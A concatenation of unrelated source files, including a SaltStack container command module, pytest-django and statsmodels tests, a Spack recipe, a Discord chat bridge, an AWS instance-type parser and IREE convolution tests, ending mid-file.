if exec_driver == "lxc-attach" and not salt.utils.path.which("lxc-attach"):
raise SaltInvocationError(
"The 'lxc-attach' execution driver has been chosen, but "
"lxc-attach is not available. LXC may not be installed."
)
return wrapped(*args, **salt.utils.args.clean_kwargs(**kwargs))
return wrapper
def _nsenter(pid):
"""
Return the nsenter command to attach to the named container
"""
return "nsenter --target {0} --mount --uts --ipc --net --pid".format(pid)
def _get_md5(name, path, run_func):
"""
Get the MD5 checksum of a file from a container
"""
output = run_func(
name, "md5sum {0}".format(pipes.quote(path)), ignore_retcode=True
)["stdout"]
try:
return output.split()[0]
except IndexError:
# Destination file does not exist or could not be accessed
return None
def cache_file(source):
"""
Wrapper for cp.cache_file which raises an error if the file was unable to
be cached.
CLI Example:
.. code-block:: bash
salt myminion container_resource.cache_file salt://foo/bar/baz.txt
"""
try:
# Don't just use cp.cache_file for this. Docker has its own code to
# pull down images from the web.
if source.startswith("salt://"):
cached_source = __salt__["cp.cache_file"](source)
if not cached_source:
raise CommandExecutionError("Unable to cache {0}".format(source))
return cached_source
except AttributeError:
raise SaltInvocationError("Invalid source file {0}".format(source))
return source
@_validate
def run(
name,
cmd,
container_type=None,
exec_driver=None,
output=None,
no_start=False,
stdin=None,
python_shell=True,
output_loglevel="debug",
ignore_retcode=False,
path=None,
use_vt=False,
keep_env=None,
):
"""
Common logic for running shell commands in containers
path
path to the container parent (for LXC only)
default: /var/lib/lxc (system default)
CLI Example:
.. code-block:: bash
salt myminion container_resource.run mycontainer 'ps aux' container_type=docker exec_driver=nsenter output=stdout
"""
valid_output = ("stdout", "stderr", "retcode", "all")
if output is None:
cmd_func = "cmd.run"
elif output not in valid_output:
raise SaltInvocationError(
"'output' param must be one of the following: {0}".format(
", ".join(valid_output)
)
)
else:
cmd_func = "cmd.run_all"
if keep_env is None or isinstance(keep_env, bool):
to_keep = []
elif not isinstance(keep_env, (list, tuple)):
try:
to_keep = keep_env.split(",")
except AttributeError:
log.warning("Invalid keep_env value, ignoring")
to_keep = []
else:
to_keep = keep_env
if exec_driver == "lxc-attach":
full_cmd = "lxc-attach "
if path:
full_cmd += "-P {0} ".format(pipes.quote(path))
if keep_env is not True:
full_cmd += "--clear-env "
if "PATH" not in to_keep:
full_cmd += "--set-var {0} ".format(PATH)
# --clear-env results in a very restrictive PATH
# (/bin:/usr/bin), use a good fallback.
full_cmd += " ".join(
[
"--set-var {0}={1}".format(x, pipes.quote(os.environ[x]))
for x in to_keep
if x in os.environ
]
)
full_cmd += " -n {0} -- {1}".format(pipes.quote(name), cmd)
elif exec_driver == "nsenter":
pid = __salt__["{0}.pid".format(container_type)](name)
full_cmd = "nsenter --target {0} --mount --uts --ipc --net --pid -- ".format(
pid
)
if keep_env is not True:
full_cmd += "env -i "
if "PATH" not in to_keep:
full_cmd += "{0} ".format(PATH)
full_cmd += " ".join(
[
"{0}={1}".format(x, pipes.quote(os.environ[x]))
for x in to_keep
if x in os.environ
]
)
full_cmd += " {0}".format(cmd)
elif exec_driver == "docker-exec":
# We're using docker exec on the CLI as opposed to via docker-py, since
# the Docker API doesn't return stdout and stderr separately.
full_cmd = "docker exec "
if stdin:
full_cmd += "-i "
full_cmd += "{0} ".format(name)
if keep_env is not True:
full_cmd += "env -i "
if "PATH" not in to_keep:
full_cmd += "{0} ".format(PATH)
full_cmd += " ".join(
[
"{0}={1}".format(x, pipes.quote(os.environ[x]))
for x in to_keep
if x in os.environ
]
)
full_cmd += " {0}".format(cmd)
if not use_vt:
ret = __salt__[cmd_func](
full_cmd,
stdin=stdin,
python_shell=python_shell,
output_loglevel=output_loglevel,
ignore_retcode=ignore_retcode,
)
else:
stdout, stderr = "", ""
proc = salt.utils.vt.Terminal(
full_cmd,
shell=python_shell,
log_stdin_level="quiet" if output_loglevel == "quiet" else "info",
log_stdout_level=output_loglevel,
log_stderr_level=output_loglevel,
log_stdout=True,
log_stderr=True,
stream_stdout=False,
stream_stderr=False,
)
# Consume output
try:
while proc.has_unread_data:
try:
cstdout, cstderr = proc.recv()
if cstdout:
stdout += cstdout
if cstderr:
if output is None:
stdout += cstderr
else:
stderr += cstderr
time.sleep(0.5)
except KeyboardInterrupt:
break
ret = (
stdout
if output is None
else {
"retcode": proc.exitstatus,
"pid": 2,
"stdout": stdout,
"stderr": stderr,
}
)
except salt.utils.vt.TerminalException:
trace = traceback.format_exc()
log.error(trace)
ret = (
stdout
if output is None
else {"retcode": 127, "pid": 2, "stdout": stdout, "stderr": stderr}
)
finally:
proc.terminate()
return ret
@_validate
def copy_to(
name,
source,
dest,
container_type=None,
path=None,
exec_driver=None,
overwrite=False,
makedirs=False,
):
"""
Common logic for copying files to containers
path
path to the container parent (for LXC only)
default: /var/lib/lxc (system default)
CLI Example:
.. code-block:: bash
salt myminion container_resource.copy_to mycontainer /local/file/path /container/file/path container_type=docker exec_driver=nsenter
"""
# Get the appropriate functions
state = __salt__["{0}.state".format(container_type)]
def run_all(*args, **akwargs):
akwargs = copy.deepcopy(akwargs)
if container_type in ["lxc"] and "path" not in akwargs:
akwargs["path"] = path
return __salt__["{0}.run_all".format(container_type)](*args, **akwargs)
state_kwargs = {}
cmd_kwargs = {"ignore_retcode": True}
if container_type in ["lxc"]:
cmd_kwargs["path"] = path
state_kwargs["path"] = path
def _state(name):
if state_kwargs:
return state(name, **state_kwargs)
else:
return state(name)
c_state = _state(name)
if c_state != "running":
raise CommandExecutionError("Container '{0}' is not running".format(name))
local_file = cache_file(source)
source_dir, source_name = os.path.split(local_file)
# Source file sanity checks
if not os.path.isabs(local_file):
raise SaltInvocationError("Source path must be absolute")
elif not os.path.exists(local_file):
raise SaltInvocationError("Source file {0} does not exist".format(local_file))
elif not os.path.isfile(local_file):
raise SaltInvocationError("Source must be a regular file")
# Destination file sanity checks
if not os.path.isabs(dest):
raise SaltInvocationError("Destination path must be absolute")
if (
run_all(name, "test -d {0}".format(pipes.quote(dest)), **cmd_kwargs)["retcode"]
== 0
):
# Destination is a directory, full path to dest file will include the
# basename of the source file.
dest = os.path.join(dest, source_name)
else:
# Destination was not a directory. We will check to see if the parent
# dir is a directory, and then (if makedirs=True) attempt to create the
# parent directory.
dest_dir, dest_name = os.path.split(dest)
if (
run_all(name, "test -d {0}".format(pipes.quote(dest_dir)), **cmd_kwargs)[
"retcode"
]
!= 0
):
if makedirs:
result = run_all(
name, "mkdir -p {0}".format(pipes.quote(dest_dir)), **cmd_kwargs
)
if result["retcode"] != 0:
error = (
"Unable to create destination directory {0} in "
"container '{1}'".format(dest_dir, name)
)
if result["stderr"]:
error += ": {0}".format(result["stderr"])
raise CommandExecutionError(error)
else:
raise SaltInvocationError(
"Directory {0} does not exist on {1} container '{2}'".format(
dest_dir, container_type, name
)
)
if (
not overwrite
and run_all(name, "test -e {0}".format(pipes.quote(dest)), **cmd_kwargs)[
"retcode"
]
== 0
):
raise CommandExecutionError(
"Destination path {0} already exists. Use overwrite=True to "
"overwrite it".format(dest)
)
# Before we try to replace the file, compare checksums.
source_md5 = __salt__["file.get_sum"](local_file, "md5")
if source_md5 == _get_md5(name, dest, run_all):
log.debug('%s and %s:%s are the same file, skipping copy', source, name, dest)
return True
log.debug('Copying %s to %s container \'%s\' as %s',
source, container_type, name, dest)
# Using cat here instead of opening the file, reading it into memory,
# and passing it as stdin to run(). This will keep down memory
# usage for the minion and make the operation run quicker.
if exec_driver == "lxc-attach":
lxcattach = "lxc-attach"
if path:
lxcattach += " -P {0}".format(pipes.quote(path))
copy_cmd = (
'cat "{0}" | {4} --clear-env --set-var {1} -n {2} -- '
'tee "{3}"'.format(local_file, PATH, name, dest, lxcattach)
)
elif exec_driver == "nsenter":
pid = __salt__["{0}.pid".format(container_type)](name)
copy_cmd = 'cat "{0}" | {1} env -i {2} tee "{3}"'.format(
local_file, _nsenter(pid), PATH, dest
)
elif exec_driver == "docker-exec":
copy_cmd = 'cat "{0}" | docker exec -i {1} env -i {2} tee "{3}"'.format(
local_file, name, PATH, dest
)
__salt__["cmd.run"](copy_cmd, python_shell=True, output_loglevel="quiet")
return source_md5 == _get_md5(name, dest, run_all)
|
the-stack_0_25305
|
import torch
from torch.autograd import Variable
from dataset import Video
from spatial_transforms import (Compose, Normalize, Scale, CenterCrop, ToTensor)
from temporal_transforms import LoopPadding
def classify_video(video_dir, video_name, class_names, model, opt, downrate):
assert opt.mode in ['score', 'feature']
spatial_transform = Compose([Scale(opt.sample_size),
CenterCrop(opt.sample_size),
ToTensor(),
Normalize(opt.mean, [1, 1, 1])])
temporal_transform = LoopPadding(opt.sample_duration)
data = Video(video_dir, spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
sample_duration=opt.sample_duration, down_rate=downrate)
data_loader = torch.utils.data.DataLoader(data, batch_size=opt.batch_size,
shuffle=False, num_workers=opt.n_threads, pin_memory=True)
video_outputs = []
video_segments = []
for i, (inputs, segments) in enumerate(data_loader):
inputs = Variable(inputs, volatile=True)
# torch: set the input volatile=True if only doing inference not back-propagation
outputs = model(inputs)
video_outputs.append(outputs.cpu().data)
video_segments.append(segments)
video_outputs = torch.cat(video_outputs)
video_segments = torch.cat(video_segments)
results = {
'video': video_name,
'clips': []
}
_, max_indices = video_outputs.max(dim=1)
for i in range(video_outputs.size(0)):
clip_results = {
'segment': video_segments[i].tolist(),
}
if opt.mode == 'score':
clip_results['label'] = class_names[max_indices[i]]
clip_results['scores'] = video_outputs[i].tolist()
elif opt.mode == 'feature':
clip_results['features'] = video_outputs[i].tolist()
results['clips'].append(clip_results)
return results
|
the-stack_0_25306
|
import pytest
@pytest.fixture
def no_ds(monkeypatch) -> None:
"""Ensure DJANGO_SETTINGS_MODULE is unset"""
monkeypatch.delenv("DJANGO_SETTINGS_MODULE")
pytestmark = pytest.mark.usefixtures("no_ds")
def test_no_ds(testdir) -> None:
testdir.makepyfile(
"""
import os
def test_env():
assert 'DJANGO_SETTINGS_MODULE' not in os.environ
def test_cfg(pytestconfig):
assert pytestconfig.option.ds is None
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
def test_database(testdir) -> None:
testdir.makepyfile(
"""
import pytest
@pytest.mark.django_db
def test_mark():
assert 0
@pytest.mark.django_db(transaction=True)
def test_mark_trans():
assert 0
def test_db(db):
assert 0
def test_transactional_db(transactional_db):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*4 skipped*"])
def test_client(testdir) -> None:
testdir.makepyfile(
"""
def test_client(client):
assert 0
def test_admin_client(admin_client):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*2 skipped*"])
def test_rf(testdir) -> None:
testdir.makepyfile(
"""
def test_rf(rf):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*1 skipped*"])
def test_settings(testdir) -> None:
testdir.makepyfile(
"""
def test_settings(settings):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*1 skipped*"])
def test_live_server(testdir) -> None:
testdir.makepyfile(
"""
def test_live_server(live_server):
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*1 skipped*"])
def test_urls_mark(testdir) -> None:
testdir.makepyfile(
"""
import pytest
@pytest.mark.urls('foo.bar')
def test_urls():
assert 0
"""
)
r = testdir.runpytest_subprocess()
assert r.ret == 0
r.stdout.fnmatch_lines(["*1 skipped*"])
|
the-stack_0_25308
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class RPcamethods(RPackage):
"""A collection of PCA methods.
Provides Bayesian PCA, Probabilistic PCA, Nipals PCA, Inverse Non-Linear
PCA and the conventional SVD PCA. A cluster based method for missing
value estimation is included for comparison. BPCA, PPCA and NipalsPCA
may be used to perform PCA on incomplete data as well as for accurate
missing value estimation. A set of methods for printing and plotting the
results is also provided. All PCA methods make use of the same data
structure (pcaRes) to provide a common interface to the PCA results.
Initiated at the Max-Planck Institute for Molecular Plant Physiology,
Golm, Germany."""
bioc = "pcaMethods"
version('1.88.0', commit='02fb58d6fe35579b86fb2ebd2eaf92e6b53444d2')
version('1.86.0', commit='9419cfa18c18dfbd1e1194127fd120ab456c3657')
version('1.82.0', commit='d500b3363308f1f8ca70625c5cd10cce59b27641')
version('1.76.0', commit='5db995330ced37dfd5ddad6ad1d90b4815d3127a')
version('1.74.0', commit='1b8f0a5cdfe3664119d0d7e926a2e0fe7320133c')
version('1.72.0', commit='1bb8c7d056645e62ee5179f6bb30b6594ebf3bfd')
version('1.70.0', commit='3368fad48ea930775505fd26e4179d7714d633d8')
version('1.68.0', commit='c8d7c93dcaf7ef728f3d089ae5d55771b320bdab')
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-biocgenerics', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('r-mass', type=('build', 'run'))
|
the-stack_0_25309
|
'''
Unit tests table.py.
:see: http://docs.python.org/lib/minimal-example.html for an intro to unittest
:see: http://agiletesting.blogspot.com/2005/01/python-unit-testing-part-1-unittest.html
:see: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/305292
'''
from __future__ import absolute_import
import unittest
try:
import numpy as np
has_numpy = True
except ImportError:
has_numpy = False
__docformat__ = "restructuredtext en"
from statsmodels.iolib.table import Cell, Row, SimpleTable
from statsmodels.iolib.table import default_latex_fmt
from statsmodels.iolib.table import default_html_fmt
ltx_fmt1 = default_latex_fmt.copy()
html_fmt1 = default_html_fmt.copy()
txt_fmt1 = dict(
data_fmts = ['%0.2f', '%d'],
empty_cell = ' ',
colwidths = 1,
colsep=' * ',
row_pre = '* ',
row_post = ' *',
table_dec_above='*',
table_dec_below='*',
header_dec_below='*',
header_fmt = '%s',
stub_fmt = '%s',
title_align='r',
header_align = 'r',
data_aligns = "r",
stubs_align = "l",
fmt = 'txt'
)
cell0data = 0.0000
cell1data = 1
row0data = [cell0data, cell1data]
row1data = [2, 3.333]
table1data = [ row0data, row1data ]
test1stubs = ('stub1', 'stub2')
test1header = ('header1', 'header2')
#test1header = ('header1\nheader1a', 'header2\nheader2a')
tbl = SimpleTable(table1data, test1header, test1stubs,
txt_fmt=txt_fmt1, ltx_fmt=ltx_fmt1, html_fmt=html_fmt1)
def custom_labeller(cell):
if cell.data is np.nan:
return 'missing'
class test_Cell(unittest.TestCase):
def test_celldata(self):
celldata = cell0data, cell1data, row1data[0], row1data[1]
cells = [Cell(datum, datatype=i%2) for i, datum in enumerate(celldata)]
for cell, datum in zip(cells, celldata):
self.assertEqual(cell.data, datum)
class test_SimpleTable(unittest.TestCase):
def test_txt_fmt1(self):
"""Limited test of custom txt_fmt"""
desired = """
*****************************
* * header1 * header2 *
*****************************
* stub1 * 0.00 * 1 *
* stub2 * 2.00 * 3 *
*****************************
"""
actual = '\n%s\n' % tbl.as_text()
#print('actual')
#print(actual)
#print('desired')
#print(desired)
self.assertEqual(actual, desired)
def test_ltx_fmt1(self):
"""Limited test of custom ltx_fmt"""
desired = r"""
\begin{tabular}{lcc}
\toprule
& \textbf{header1} & \textbf{header2} \\
\midrule
\textbf{stub1} & 0.0 & 1 \\
\textbf{stub2} & 2 & 3.333 \\
\bottomrule
\end{tabular}
"""
actual = '\n%s\n' % tbl.as_latex_tabular()
#print(actual)
#print(desired)
self.assertEqual(actual, desired)
def test_html_fmt1(self):
"""Limited test of custom html_fmt"""
desired = """
<table class="simpletable">
<tr>
<td></td> <th>header1</th> <th>header2</th>
</tr>
<tr>
<th>stub1</th> <td>0.0</td> <td>1</td>
</tr>
<tr>
<th>stub2</th> <td>2</td> <td>3.333</td>
</tr>
</table>
"""
#the previous has significant trailing whitespace that got removed
#desired = '''\n<table class="simpletable">\n<tr>\n <td></td> <th>header1</th> <th>header2</th>\n</tr>\n<tr>\n <th>stub1</th> <td>0.0</td> <td>1</td> \n</tr>\n<tr>\n <th>stub2</th> <td>2</td> <td>3.333</td> \n</tr>\n</table>\n'''
actual = '\n%s\n' % tbl.as_html()
actual = '\n'.join((line.rstrip() for line in actual.split('\n')))
#print(actual)
#print(desired)
#print len(actual), len(desired)
self.assertEqual(actual, desired)
def test_customlabel(self):
"""Limited test of custom custom labeling"""
if has_numpy:
tbl = SimpleTable(table1data, test1header, test1stubs, txt_fmt=txt_fmt1)
tbl[1][1].data = np.nan
tbl.label_cells(custom_labeller)
#print([[c.datatype for c in row] for row in tbl])
desired = """
*****************************
* * header1 * header2 *
*****************************
* stub1 * -- * 1 *
* stub2 * 2.00 * 3 *
*****************************
"""
actual = '\n%s\n' % tbl.as_text(missing='--')
#print(actual)
#print(desired)
self.assertEqual(actual, desired)
if __name__=="__main__":
unittest.main()
|
the-stack_0_25311
|
"""
Exercise Python 080:
Crie um programa onde o usuário possa digitar cinco valores numéricos
e cadastre-os em uma listaa, já na posição correta de inserção (sem usar o sort()).
No final, mostre a listaa ordenada na tela.
"""
lista = []
count = 0
while True:
count += 1
n = int(input('Enter with value: '))
if n not in lista:
if count == 1 or n > lista[-1]:
lista.append(n)
print(' Added at the bottom of the lista ')
else:
indice = 0
while indice < len(lista):
if n <= lista[indice]:
lista.insert(indice, n)
print('Added in position {} of lista.'.format(indice))
break
indice += 1
else:
print('Duplicate')
leave = str(input('Do you want leave? [y/n] ')).upper()
if leave in 'Y':
break
print(lista)
|
the-stack_0_25313
|
# -*- coding: utf-8 -*-
import sys
MODULE_LIST = ["ednet.info",
"ednet.util",
"ednet.sequentialguid",
"ednet.appsettings",
"ednet.ad",
"ednet.w2py",
"ednet.canvas",
"ednet.student",
"ednet.faculty"
]
def ReloadModules():
global MODULE_LIST
# Web2py adds this prefix to modules
prefix = "applications.smc.modules."
msg = ""
if sys.version_info[0] == 2:
# Python 2
# msg = "Detected Python2:"
for m in MODULE_LIST:
msg += "-- Reload: " + m + " "
module_name = prefix + m
if module_name in sys.modules:
try:
#reload(sys.modules[module_name])
pass
print("Python2 detected - no longer supported!")
except Exception as ex:
msg += str(ex)
else:
msg += "<- " + m + " not loaded yet"
elif sys.version_info[0] == 3 and sys.version_info[1] < 4:
# Python 3 < 3.4
msg = "Detected < Python 3.4:"
import imp
for m in MODULE_LIST:
msg += " - " + m
imp.reload(m)
elif sys.version_info[0] == 3 and sys.version_info[1] > 3:
# Python 3 > 3.3
msg = "Detected > Python 3.3: "
import importlib
for m in MODULE_LIST:
msg += " - " + m
m_obj = sys.modules[m]
importlib.reload(m_obj)
else:
msg = "Unknown Python?!?!? " + str(sys.version_info)
return msg
|
the-stack_0_25314
|
"""
Test some more expression commands.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class ExprCommands2TestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break for main.c.
self.line = line_number(
'main.cpp',
'// Please test many expressions while stopped at this line:')
def test_more_expr_commands(self):
"""Test some more expression commands."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=False)
self.runCmd("run", RUN_SUCCEEDED)
# Does static casting work?
self.expect("expression (int*)argv",
startstr="(int *) $0 = 0x")
# (int *) $0 = 0x00007fff5fbff258
# Do return values containing the contents of expression locals work?
self.expect("expression int i = 5; i",
startstr="(int) $1 = 5")
# (int) $2 = 5
self.expect("expression $1 + 1",
startstr="(int) $2 = 6")
# (int) $3 = 6
# Do return values containing the results of static expressions work?
self.expect("expression 20 + 3",
startstr="(int) $3 = 23")
# (int) $4 = 5
self.expect("expression $3 + 1",
startstr="(int) $4 = 24")
# (int) $5 = 6
@skipIfLinux
@expectedFailureAll(oslist=["windows"], bugnumber="llvm.org/pr24489")
def test_expr_symbols(self):
"""Test symbols."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self, "main.cpp", self.line, num_expected_locations=1, loc_exact=False)
self.runCmd("run", RUN_SUCCEEDED)
# Do anonymous symbols work?
self.expect("expression ((char**)environ)[0]",
startstr="(char *) $0 = 0x")
# (char *) $1 = 0x00007fff5fbff298 "Apple_PubSub_Socket_Render=/tmp/launch-7AEsUD/Render"
|
the-stack_0_25318
|
import asyncio
import os
import queue
import random
import socket
import sys
import telnetlib
import threading
import discord
class socketserver(threading.Thread):
"""Socket server, starts a server on a fixed port, writes all recived messages to stdin and sends new queue items back"""
def __init__(self, inqueue, outqueue, args=(), kwargs=None):
threading.Thread.__init__(self, args=(), kwargs=None)
self.inqueue = inqueue
self.outqueue = outqueue
self.daemon = True
self.HOST = ""
self.PORT = random.randint(50000, 50100)
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.soc.bind((self.HOST, self.PORT))
def run(self):
self.soc.listen(1)
conn, addr = self.soc.accept()
if addr[0] != "127.0.0.1":
return
conn.setblocking(False)
while True:
try:
data = conn.recv(1024)
except BlockingIOError:
data = b""
if data:
if data == b"/kill\n":
break
self.outqueue.put(data, False)
try:
val = self.inqueue.get(block=False)
conn.sendall(val.encode())
except queue.Empty:
pass # no data avalable
# Threads:
# Discord.py < runs discord.py
# Telnet < accepts input
# socket server < runs a socket that interfaces discord.py and telnet
# autologout < when the discord bot is blocking, this detects the server shutting down and logs out the bot
def telnetThread(port):
print("telnet connect")
i = telnetlib.Telnet("localhost", port)
print("done")
print("\n")
try:
i.mt_interact()
except KeyboardInterrupt:
pass
i.close()
discordkey = os.environ.get("dkey", None)
if discordkey is None:
print("Set the environ dkey to your discord api key for discord.py")
sys.exit(1)
channelid = os.environ.get("channelid", None)
if channelid is None:
print(
"Set the environ channelid to the channel id of the discord channel you want to talk in"
)
sys.exit(1)
# do discord.py stuff
def getmemberfromid(client, id):
return discord.utils.get(client.get_all_members(), id=id)
def getincoming():
mes = []
while True:
try:
mes.append(oq.get(False))
except queue.Empty:
break
return mes
class MyClient(discord.Client):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# create the background task and run it in the background
self.bg_task = self.loop.create_task(self.autorestart())
async def on_ready(self):
self.print("Logged in as")
self.print(self.user.name)
self.print(self.user.id)
self.print("------")
thr.start()
async def on_message(self, message):
if message.author != message.guild.get_member(self.user.id):
mes = message.clean_content
self.print("{}:{}".format(message.author.display_name, mes))
def print(self, mes):
iq.put(str(mes) + "\n")
async def autorestart(self):
while not self.is_closed():
try:
await self.message_sender()
except:
print("Error in message_sender, restarting...")
async def message_sender(self):
global channelid
await self.wait_until_ready()
channel = self.get_channel(int(channelid))
self.print("Chatting in {}".format(channel.name))
while not self.is_closed():
newmes = getincoming()
for mes in newmes:
mes = mes.decode()
if mes.startswith("/"):
mes = mes.split("/")[1]
if mes.startswith("channel"):
newchannelid = mes.split(" ")[1]
self.print("Switching to channel...")
channel = self.get_channel(int(newchannelid))
channelid = newchannelid
self.print("Chatting in {}".format(channel.name))
elif mes.startswith("list-channel"):
serverid = mes.split(" ")[1]
dserver = self.get_guild(int(serverid))
self.print("Channels in server {}".format(
dserver.name))
# print(dserver.channels)
for chanel in dserver.channels:
if isinstance(chanel, discord.TextChannel):
self.print("{}:{}".format(
chanel.name, chanel.id))
elif mes.startswith("list-servers") or mes.startswith(
"list-guilds"):
self.print("Guilds/Servers:")
for guild in self.guilds:
self.print("{}:{}".format(guild.name, guild.id))
elif mes.startswith("isbot"):
self.print("You are{} a bot".format({
False: " not",
True: ""
}[self.user.bot]))
elif mes.startswith("userinfo"):
id = mes.split(" ")[1]
user = getmemberfromid(self, int(id))
if user is None:
self.print("No user found")
else:
self.print(
"{}#{}\nID:{}\nBot:{}\nCreated on:{}".format(
user.name,
user.discriminator,
user.id,
user.bot,
user.created_at,
))
self.print("String to mention:{}".format(
user.mention))
try:
if not user.bot:
profile = await user.profile()
else:
profile = None
iq.put("User is bot so ")
except (discord.HTTPException, discord.Forbidden):
profile = None
if profile is None:
self.print("Unable to grab profile")
else:
self.print("Has nitro:{}".format(
profile.nitro))
if profile.nitro:
self.print("Nitro since:{}".format(
profile.premium_since))
self.print("Hypesquad:{}".format(
profile.hypesquad))
if profile.hypesquad:
self.print("Houses:{}".format(
profile.hypesquad_houses))
else:
self.print("Invalid Command!")
else:
await channel.send(mes)
await asyncio.sleep(1) # task runs every 60 seconds
iq = queue.Queue()
oq = queue.Queue()
server = socketserver(iq, oq)
server.start()
thr = threading.Thread(target=telnetThread, args=(server.PORT, ), daemon=True)
def autologout(server, dclient):
server.join()
print("Logging Out")
loop = dclient.loop
dclient.logouttask = loop.create_task(dclient.logout())
i = False
while not i:
i = dclient.is_closed()
client = MyClient()
autolog = threading.Thread(target=autologout,
args=(server, client),
daemon=False)
autolog.start()
client.run(discordkey)
autolog.join()
|
the-stack_0_25320
|
"""
AWSInstanceType
===============
This parser simply reads the output of command
``curl http://169.254.169.254/latest/meta-data/instance-type``,
which is used to check the type of the AWS instance on the host.
"""
from insights.parsers import SkipException, ParseException
from insights import parser, CommandParser
from insights.specs import Specs
@parser(Specs.aws_instance_type)
class AWSInstanceType(CommandParser):
"""
Class for parsing the AWS Instance type returned by command
``curl http://169.254.169.254/latest/meta-data/instance-type``
Typical output of this command is::
r3.xlarge
Raises:
SkipException: When content is empty or no parse-able content.
ParseException: When type cannot be recognized.
Attributes:
type (str): The name of AWS instance type in all uppercase letters. E.g. R3, R4, R5, or X1.
raw (str): The fully type string returned by the ``curl`` command.
Examples:
>>> aws_inst.type
'R3'
>>> aws_inst.raw
'r3.xlarge'
"""
def parse_content(self, content):
if (not content or len(content) > 1 or 'curl: ' in content[0]):
raise SkipException()
self.raw = self.type = None
if '.' in content[0]:
self.raw = content[0].strip()
self.type = self.raw.split('.')[0].upper()
if not self.type:
raise ParseException('Unrecognized type: "{0}"', content[0])
def __repr__(self):
return "<aws_type: {t}, raw: {r}>".format(t=self.type, r=self.raw)
|
the-stack_0_25321
|
# Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl import app
import numpy as np
from pyiree.tf.support import tf_test_utils
from pyiree.tf.support import tf_utils
import tensorflow.compat.v2 as tf
class DepthConv2dModule(tf.Module):
# TODO(ataei): Add dilation and strided tests.
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 2], tf.float32),
tf.TensorSpec([2, 2, 2, 3], tf.float32),
])
def conv2d_2452x2423_valid(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 1, 1, 1],
"VALID",
name="result")
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 2], tf.float32),
tf.TensorSpec([2, 4, 2, 3], tf.float32),
])
def conv2d_2452x2423_same(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 1, 1, 1],
"SAME",
name="result")
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 2], tf.float32),
tf.TensorSpec([2, 4, 2, 3], tf.float32),
])
def conv2d_2452x2423_valid_stride_2(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 2, 2, 1],
"VALID",
name="result")
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 2], tf.float32),
tf.TensorSpec([2, 4, 2, 3], tf.float32),
])
def conv2d_2452x2423_same_stride_2(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 2, 2, 1],
"SAME",
name="result")
@tf.function(input_signature=[
tf.TensorSpec([2, 4, 5, 4], tf.float32),
tf.TensorSpec([2, 4, 4, 1], tf.float32),
])
def conv2d_2453x2441_same_stride_1(self, img, kernel):
return tf.nn.depthwise_conv2d(img,
kernel, [1, 1, 1, 1],
"SAME",
name="result")
class ConvTest(tf_test_utils.TracedModuleTestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._modules = tf_test_utils.compile_tf_module(DepthConv2dModule)
# yapf: disable
def test_batched_feature_unpadded(self):
def batched_feature_unpadded(module):
i = tf_utils.ndarange([2, 4, 5, 2])
k = tf_utils.ndarange([2, 2, 2, 3])
module.conv2d_2452x2423_valid(i, k)
self.compare_backends(batched_feature_unpadded, self._modules)
def test_batched_feature_unpadded_same(self):
def batched_feature_unpadded_same(module):
i = tf_utils.ndarange([2, 4, 5, 2])
k = tf_utils.ndarange([2, 4, 2, 3])
module.conv2d_2452x2423_same(i, k)
self.compare_backends(batched_feature_unpadded_same, self._modules)
def test_batched_feature_unpadded_same_stride_2(self):
def batched_feature_unpadded_same_stride_2(module):
i = tf_utils.ndarange([2, 4, 5, 2])
k = tf_utils.ndarange([2, 4, 2, 3])
module.conv2d_2452x2423_valid_stride_2(i, k)
self.compare_backends(batched_feature_unpadded_same_stride_2,
self._modules)
def test_batched_feature_padded_same_stride_2(self):
def batched_feature_padded_same_stride_2(module):
i = tf_utils.ndarange([2, 4, 5, 2])
k = tf_utils.ndarange([2, 4, 2, 3])
module.conv2d_2452x2423_same_stride_2(i, k)
self.compare_backends(batched_feature_padded_same_stride_2, self._modules)
def test_batched_feature_padded_same_stride_1_output_1(self):
def batched_feature_padded_same_stride_1_output_1(module):
i = tf_utils.ndarange([2, 4, 5, 4])
